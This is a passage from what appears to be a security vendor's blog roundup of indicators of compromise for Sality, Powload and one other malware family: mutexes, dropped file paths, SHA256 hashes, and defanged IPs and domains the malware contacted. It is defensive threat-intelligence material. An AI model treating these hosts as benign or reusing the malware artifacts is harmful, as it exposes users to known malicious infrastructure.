/><ul><li>%LocalAppData%\Temp\VBE\MSForms.exd</li><li>%AppData%\Microsoft\Excel\XLSTART</li><li>%UserProfile%\Documents\20181119</li><li>%TEMP%\tmp907.bat</li><li>%LocalAppData%\Temp\tmp016.exe</li><li>%LocalAppData%\Temp\CVR4F0E.tmp</li><li>%LocalAppData%\Temp\twaibr0n.00s.ps1</li></ul><b>File Hashes</b><br /><ul><li>199f1eec8413168be6418ace60cfe760d858350ebef3605aa91d47338b881e0c</li><li>1f444338e19212dfe5f597ceb3b55f06a8b927a342ce50d0c5ae4452d4999e80</li><li>49fbb593eb1418ecbbefd3ac0529ccf1ed2ef64e20927a5e0379f99ec9fd0c9b</li><li>5ac6fb69b5c55ec6419b89e22ce7fd873d11d263ae2eda9ff85e8eda10b20444</li><li>644f8f3822eb0c5435ffbec711a0b2821e1fa050ca10c837a62c02a9df814d9d</li><li>77f27841d4263d1ed6ba59267d78a454c9a2a3383ee3f1a2a5ddbed4e835dd06</li><li>83cf5c7623bc92966e02b594bb41ab3896b1ffaae748d7cc9b4331f3f435f171</li><li>9a422430a9443b77b5959847657ec411736e180b30563b5066d1ea0c7b22633e</li><li>9bfd539bb55f7a7a5a8df5a0e3ecd87157ecd87675915ac01ca6ce62a3402872</li><li>9dbd2fc30b9c22fb03df72eb46ea83af41449bb6054cdf8cd83e5520de633641</li><li>a46e400bbf7b921a5b2e131ac3c8bf10506569466ad3fff99381c411e585192d</li><li>a6043595251b41b336ca8bc2ccc05bc2bf2781274c1893d6943141a4bd3cf637</li><li>a6d95c0eac0c0b584faa37c1e21ee5baad74e227685275899a9d8c5ac2806b9d</li><li>be6ac030af25e2044cf8889d747fa170bcbb10a325a3f05f67194379f86375ca</li><li>c7c3ded9554e8ca38031ab080c1ed9d775a20ac928eaded8d24fb325d7c6be1f</li><li>cba2b5d0949ff517c40f74cf166b7c363dbf54bda30d4e8432f31da674a78b9c</li><li>e4fcc415e1f7cec20991a6e5612c7706c1187e23ecea5115fbeea824c9b06c14</li><li>efd04977ffd67e71dc9730268a7cee0b85ca128c0e0e3962b073494e5e9f2081</li><li>f495fc57c7bd8311cee17ea6dc15c953d21c5fd97147e632a509b07217855501</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-O5JdcyLFXlw/XBP9G9KIhyI/AAAAAAAABSU/Fb8-1HfmyYc46Uk0ms3c3jNo9oDjwfHZwCLcBGAs/s1600/efd04977ffd67e71dc9730268a7cee0b85ca128c0e0e3962b073494e5e9f2081_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://1.bp.blogspot.com/-O5JdcyLFXlw/XBP9G9KIhyI/AAAAAAAABSU/Fb8-1HfmyYc46Uk0ms3c3jNo9oDjwfHZwCLcBGAs/s400/efd04977ffd67e71dc9730268a7cee0b85ca128c0e0e3962b073494e5e9f2081_amp.png" width="400" /></a></div><b><br /></b><br /><b>ThreatGrid</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-7wUWniPcHQs/XBP9Lcai8OI/AAAAAAAABSc/__MyYjcDftcS9oUxDgtP-P_65Ozx-w06ACLcBGAs/s1600/efd04977ffd67e71dc9730268a7cee0b85ca128c0e0e3962b073494e5e9f2081_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://3.bp.blogspot.com/-7wUWniPcHQs/XBP9Lcai8OI/AAAAAAAABSc/__MyYjcDftcS9oUxDgtP-P_65Ozx-w06ACLcBGAs/s640/efd04977ffd67e71dc9730268a7cee0b85ca128c0e0e3962b073494e5e9f2081_tg.png" width="640" /></a></div><b><br /></b><br /><b>Umbrella</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-yredc2BiSPk/XBP9QAeSJiI/AAAAAAAABSg/14wk9FmahHEtqNmAs3wj09j8eoshZ3tdwCLcBGAs/s1600/efd04977ffd67e71dc9730268a7cee0b85ca128c0e0e3962b073494e5e9f2081_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="272" data-original-width="870" height="200" src="https://3.bp.blogspot.com/-yredc2BiSPk/XBP9QAeSJiI/AAAAAAAABSg/14wk9FmahHEtqNmAs3wj09j8eoshZ3tdwCLcBGAs/s640/efd04977ffd67e71dc9730268a7cee0b85ca128c0e0e3962b073494e5e9f2081_umbrella.png" width="640" /></a></div><b><br /></b><br /><b>Malware</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-a-Jhj8mpZhI/XBP9VfQ6UtI/AAAAAAAABSk/Dg-YJgmbjmwLGhrUBhf5QwnvzU7zg_xkQCLcBGAs/s1600/efd04977ffd67e71dc9730268a7cee0b85ca128c0e0e3962b073494e5e9f2081_malware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="480" src="https://2.bp.blogspot.com/-a-Jhj8mpZhI/XBP9VfQ6UtI/AAAAAAAABSk/Dg-YJgmbjmwLGhrUBhf5QwnvzU7zg_xkQCLcBGAs/s640/efd04977ffd67e71dc9730268a7cee0b85ca128c0e0e3962b073494e5e9f2081_malware.png" width="640" /></a></div><br /><br /><h3>Win.Virus.Sality-6780277-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>N/A</li></ul><b>Mutexes</b><br /><ul><li>uxJLpe1m</li><li>wininit.exeM_320_</li><li>winlogon.exeM_356_</li><li>wudfhost.exeM_1644_</li><li>\BaseNamedObjects\uxJLpe1m</li><li>\BaseNamedObjects\csrss.exeM_528_</li><li>\BaseNamedObjects\services.exeM_664_</li><li>\BaseNamedObjects\lsass.exeM_676_</li><li>\BaseNamedObjects\svchost.exeM_1008_</li><li>\BaseNamedObjects\smss.exeM_364_</li><li>\BaseNamedObjects\spoolsv.exeM_1560_</li><li>\BaseNamedObjects\winlogon.exeM_552_</li><li>\BaseNamedObjects\ctfmon.exeM_204_</li><li>\BaseNamedObjects\svchost.exeM_912_</li><li>\BaseNamedObjects\userinit.exeM_1372_</li><li>\BaseNamedObjects\svchost.exeM_832_</li><li>\BaseNamedObjects\jqs.exeM_1736_</li><li>\BaseNamedObjects\rundll32.exeM_948_</li><li>\BaseNamedObjects\explorer.exeM_1456_</li><li>\BaseNamedObjects\svchost.exeM_1116_</li><li>\BaseNamedObjects\wmiprvse.exeM_440_</li><li>wmiprvse.exeM_776_</li><li>\BaseNamedObjects\wmiadap.exeM_3280_</li><li>\BaseNamedObjects\356677150.exeM_1408_</li><li>\BaseNamedObjects\wmiprvse.exeM_1688_</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Files and or directories created</b><br /><ul><li>\??\E:\autorun.inf</li><li>%System32%\drivers\lhlnn.sys</li><li>%SystemDrive%\Documents and Settings\Administrator\Cookies\administrator@cargocrystal[1].txt</li><li>%SystemDrive%\Documents and Settings\Administrator\Cookies\administrator@cargocrystal[2].txt</li><li>%SystemDrive%\Documents and Settings\Administrator\Cookies\administrator@samayer[1].txt</li><li>%LocalAppData%\Temp\wingqijig.exe</li><li>%SystemDrive%\okieu.exe</li><li>\??\E:\mshy.pif</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\augx.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bvwf.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ceohbt.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\cevjx.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\dkgn.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\easrrv.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\gekhk.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\glya.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\hpqd.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ixway.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\jbccl.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\jhrim.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\jvuj.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\kdpw.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\kwih.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\lmbonl.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\lpig.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ltyyd.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\mqsr.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\mskjgp.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\mslmw.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ndcdl.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\niut.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\nixbf.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\nygs.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\olsit.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ospd.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\pffcy.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\rfioy.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\rxoqk.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tguha.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tvuin.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\uspe.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\vkecy.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\vtba.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\vxqq.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\vylwe.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\whtfo.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winadpngm.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winasew.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winauunwn.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winbkjyy.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winbpcf.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winbusg.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\windlwd.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\windpbi.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wineeyux.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winesrg.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winfjvcgs.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winfpmye.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winiuak.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winjenpka.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winjkyn.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winkqxb.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winkrepqp.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winktee.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winlbehwb.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winlihxj.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winlsbpg.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winlxanm.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winlywa.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winmtfju.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winneng.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winnjxa.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winnurxrn.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winodpm.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winohuuif.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winolmyt.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winonwqwp.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winpcpvjx.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winpdae.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winpdgmo.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winpgqpu.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winpmlm.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winpnsv.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winpuybd.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wintqckmy.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winudusnh.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winuixn.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winvcwb.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winvxxb.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winwbnx.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winwbppmo.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winydntxg.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winyksvqi.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winyqksg.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\xfkklk.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\xgvmsf.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\xmjmf.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\xwota.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\yxjkrt.exe</li><li>%SystemDrive%\eetdut.exe</li></ul><b>File Hashes</b><br /><ul><li>02e3ca0b78494efa9c54f41856fbf50478673329ea238c7786bdeb30542e5ed5</li><li>034336a710468f49c1eed9d375a85d4d7f48ecc271dde830f60b428d52a94c2b</li><li>0a9a606be52079bc06d34ee969313e58809c8bf4978e31101ce329b7651f564e</li><li>2055ba5f6fa09c201359729adc6c0e20ad97346d698b5801b601d29a85e78c52</li><li>34b3a1c08a185f7755b8fe3f741e13a6452b46766b2b564cd329c45bd45e1c76</li><li>38764b867874a08bd44e8a4b78b670e7445f93af546fba0443c99f56d469a951</li><li>3bd14203a0587eea25421d679fc5d7c598464e5fde6f39cf7e6a506fa86aaf5c</li><li>40d8f51d911e4f4d3fa29fcd39adc9e826557727dc1ec411404d6bd09c7f8c35</li><li>518b8b1dea7caf5f1c2d9b6f6ef32ba70effc2f74ebd7a902434fc66e179700e</li><li>609dcb6f088836745f24a24d71b49e092196b08a9924f42e8b63b92f4c0ebe24</li><li>6f8fec09c16a0f5bb60e3ec4cd1a41cb34a2eaa59d0351f5f875a83dd7ec8411</li><li>76cb38ecf5c3b925e946b6da3cc78e25e0df6db48c66073a6dc33bb8bc03cb5c</li><li>78784ee614b06d505879ec8454a80843416aa89869ecfb7eb059aadb14027178</li><li>7d5787833d365d5a2d84c0e6135106bd6d5a49de4da86857995cf0222491c028</li><li>8089f6db67efb482755dfc06ee4efe7271e685136e46a231b06bff87aca4393b</li><li>9af10868ac775ec789e3b9e7475015c3ba66f9ed35aabcfe8ea323b9b1a8d7a5</li><li>9fadad87f4763f5a062c0c12677b3b549f9df261484ad89cf58bb60809751e9c</li><li>a543f5d10445af1ce7710cc596b2b6ab0532cef51e9041b8f8c58bd36b218dd9</li><li>ac9ee5d47307f578e1a19a96dfb509a5063045a339ffcf1dc79f6a559f6385c3</li><li>c3a88516553f23807115597f99f0b8f9e8a62c68bf7ee321bf1ff6c599c3c8f1</li><li>c96d2cd51eff903958ccc279fa48e392e858403aead3add4b00e6e9b031d5754</li><li>d2da9a2988364a576679489265765e8bd5419ea66e8aea48e666a5300f2c5e6f</li><li>e080790b62f025fedc93b161dc061421ae47cf4785ecb1744d6da1be44f8667a</li><li>e1a951d34a0c35cc5a011242189ed82707d3fc40289b37470169703f269d88f4</li><li>e1d9701b9af405e448e57714ee762722c3ddc6306d271038c350b0cfc138cebc</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-UpMlXO6trVE/XBP9m0y7GJI/AAAAAAAABS0/zQOXL2fjIqYiMy-TbTr48GkmFyfqxu5GQCLcBGAs/s1600/3bd14203a0587eea25421d679fc5d7c598464e5fde6f39cf7e6a506fa86aaf5c_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://2.bp.blogspot.com/-UpMlXO6trVE/XBP9m0y7GJI/AAAAAAAABS0/zQOXL2fjIqYiMy-TbTr48GkmFyfqxu5GQCLcBGAs/s400/3bd14203a0587eea25421d679fc5d7c598464e5fde6f39cf7e6a506fa86aaf5c_amp.png" width="400" /></a></div><b><br /></b><br /><b>ThreatGrid</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-3GDbZ6rULQs/XBP9riksPKI/AAAAAAAABS4/F1GUgLWhotI2V53CndYABOwu1skebOEeACLcBGAs/s1600/3bd14203a0587eea25421d679fc5d7c598464e5fde6f39cf7e6a506fa86aaf5c_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://3.bp.blogspot.com/-3GDbZ6rULQs/XBP9riksPKI/AAAAAAAABS4/F1GUgLWhotI2V53CndYABOwu1skebOEeACLcBGAs/s640/3bd14203a0587eea25421d679fc5d7c598464e5fde6f39cf7e6a506fa86aaf5c_tg.png" width="640" /></a></div><br /><br /><b>Umbrella</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-pqpP8WO98LY/XBP90TehqqI/AAAAAAAABS8/pv8PQek8YY49_q121AtlzlCwkJ5m9Ss6wCLcBGAs/s1600/3bd14203a0587eea25421d679fc5d7c598464e5fde6f39cf7e6a506fa86aaf5c_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="272" data-original-width="870" height="200" src="https://4.bp.blogspot.com/-pqpP8WO98LY/XBP90TehqqI/AAAAAAAABS8/pv8PQek8YY49_q121AtlzlCwkJ5m9Ss6wCLcBGAs/s640/3bd14203a0587eea25421d679fc5d7c598464e5fde6f39cf7e6a506fa86aaf5c_umbrella.png" width="640" /></a></div><br /><br /><b>Malware</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-grY0ueX0ORc/XBP956868WI/AAAAAAAABTA/7RxVXMA_IcEljKxWRlhgLsEus1YnTsbVACLcBGAs/s1600/78784ee614b06d505879ec8454a80843416aa89869ecfb7eb059aadb14027178_malware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="480" src="https://4.bp.blogspot.com/-grY0ueX0ORc/XBP956868WI/AAAAAAAABTA/7RxVXMA_IcEljKxWRlhgLsEus1YnTsbVACLcBGAs/s640/78784ee614b06d505879ec8454a80843416aa89869ecfb7eb059aadb14027178_malware.png" width="640" /></a></div><br /><br /><h3>Doc.Malware.Powload-6775735-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>N/A</li></ul><b>Mutexes</b><br /><ul><li>Global\552FFA80-3393-423d-8671-7BA046BB5906</li><li>Local\ZonesCacheCounterMutex</li><li>Local\ZonesLockedCacheCounterMutex</li><li>RasPbFile</li><li>Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2580483871-590521980-3826313501-500</li><li>Global\MTX_MSO_AdHoc1_S-1-5-21-2580483871-590521980-3826313501-500</li><li>Global\MTX_MSO_Formal1_S-1-5-21-2580483871-590521980-3826313501-500</li><li>Local\10MU_ACB10_S-1-5-5-0-57527</li><li>Local\10MU_ACBPIDS_S-1-5-5-0-57527</li><li>Local\WinSpl64To32Mutex_e162_0_3000</li><li>\BaseNamedObjects\Global\.net clr networking</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>199[.]188[.]200[.]110</li><li>185[.]72[.]59[.]32</li><li>185[.]87[.]51[.]118</li><li>185[.]2[.]4[.]116</li><li>177[.]185[.]194[.]161</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>www[.]w3[.]org</li><li>tecleweb[.]com[.]br</li><li>chiporestaurante[.]com</li><li>www[.]onecubeideas[.]com</li><li>onecubeideas[.]com</li><li>dc[.]amegt[.]com</li><li>fortools[.]ru</li></ul><b>Files and or directories created</b><br /><ul><li>%WinDir%\ServiceProfiles\LocalService\AppData\Local\lastalive0.dat</li><li>%WinDir%\ServiceProfiles\LocalService\AppData\Local\lastalive1.dat</li><li>%LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{257D7FC1-A1F1-4741-80E5-4CCDA3324B78}.tmp</li><li>%AppData%\Microsoft\Templates\~$Normal.dotm</li><li>%AppData%\Microsoft\Word\STARTUP</li><li>%AppData%\Microsoft\Office\Recent\index.dat</li><li>\EVENTLOG</li><li>\ROUTER</li><li>%UserProfile%\Documents\20181207</li><li>%LocalAppData%\Temp\705.exe</li><li>%LocalAppData%\Temp\CVR8C5B.tmp</li><li>%AppData%\Microsoft\Office\Recent\355848530.doc.LNK</li><li>%SystemDrive%\~$5848530.doc</li><li>%LocalAppData%\Temp\fjzx2n2i.cc2.ps1</li><li>%LocalAppData%\Temp\qfrje44a.wpp.psm1</li><li>%LocalAppData%\Temp\~DF25D3033E1B874DBC.TMP</li><li>%AppData%\Microsoft\Office\Recent\37c08bc14f578f0b19f992648c113e46dc49e0ad1ddc9cd2e63dfb9242fe151c.LNK</li></ul><b>File Hashes</b><br /><ul><li>02c58585c45ba7f87a94eb10fda2ad3d1216dae821536c77bd1f53b5b48730cf</li><li>0aac7ab733c51437873bf791b28557b12e027bf9bf1b3eafcde05388010af655</li><li>0cc53d287e5df9017989526addc988b49fcd76894032458720acad7c265df9de</li><li>14ab7c3501e5ea1482687558d1544698b85cd9b24b3580245a85ce0b781c03e7</li><li>1af67c800700954695d42c3e124753750016b7c598c6fa2f9bcd9f85723dd1c6</li><li>1bfc31debc05dc83864b01ddf300552ec6496cc0d1c25b5846fcd2a4c5da93df</li><li>1e0c90f629beae558c6af53c3def9cda4bc77d06cd42131b8f969ff0da9afe25</li><li>1ff1729697c956aa4270731f63686d2f6aa1e86a47d219f32058fa67be31817f</li><li>21982965fc5661c509d1833f8fe9caf02d7649619b7b542d7a735abd7936a9cd</li><li>21e781747a69ebeda636616b47fdd4ff871b9c672aad10f3cf95cbd55eb8b169</li><li>239fea895e2a4a3bd3c3339ce48b2f330bd611d8120e0937aca1c8581e977849</li><li>2759147c5b948b705943cc4dfe7932aaeb14bda833ed00a850d1ee5543bac6c3</li><li>2b3064f31f52b8d33a9a7f73c1624252f4a2b615df0c99b4c70b4c617eed87fa</li><li>2c97f2997575df803d28dd38636856fd0efb9fa7efaea22c526b8dc71daa9aee</li><li>370c83daaa8ad3c9e1f684ac93a5c7436e86bab917f8511544792f083fd8d127</li><li>37c08bc14f578f0b19f992648c113e46dc49e0ad1ddc9cd2e63dfb9242fe151c</li><li>3ac2d948a193f03d6d6bbd288ab9ae2b58588567e459aecae80a66e00a291847</li><li>3b958df2dedb42704c2baf7b9dff89112db8e8297a594ebe98303f9913004e9b</li><li>54bf05efacb556c7ed106a9b802619b2f038d1e6b8adbcf4c8d632f8531e68be</li><li>56de2fad613807e46613e7159681a962cc8c54fc6ed20c7c3e90e104cdbfeaff</li><li>590cb8e2648bc9566d2709a22d33369309e32ddfcf6cf725dfce6b0efb2b51b3</li><li>5a2763ea3481568a73456a2e784b6b31b32845ec08df99b3394533ecdb0f973a</li><li>5f47e689fb44578d43e4c7590ce10c275f7f533c894387086bf5e0bb3a68e46d</li><li>626ead7063f00752432c54dcb61975b060e306f2712fa2fb1e6f3aa4cc406e1a</li><li>6714f37afcbe1d0685770f9558c40d0856e7c337f8d4c4beb7e312672adda950</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-hirdB2Bsdns/XBP-K0vfhaI/AAAAAAAABTQ/y0eonBwQeK8TKlcR2sZEt4BVHPJC_r_FgCLcBGAs/s1600/2759147c5b948b705943cc4dfe7932aaeb14bda833ed00a850d1ee5543bac6c3_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://2.bp.blogspot.com/-hirdB2Bsdns/XBP-K0vfhaI/AAAAAAAABTQ/y0eonBwQeK8TKlcR2sZEt4BVHPJC_r_FgCLcBGAs/s400/2759147c5b948b705943cc4dfe7932aaeb14bda833ed00a850d1ee5543bac6c3_amp.png" width="400" /></a></div><b><br /></b><br /><b>ThreatGrid</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a 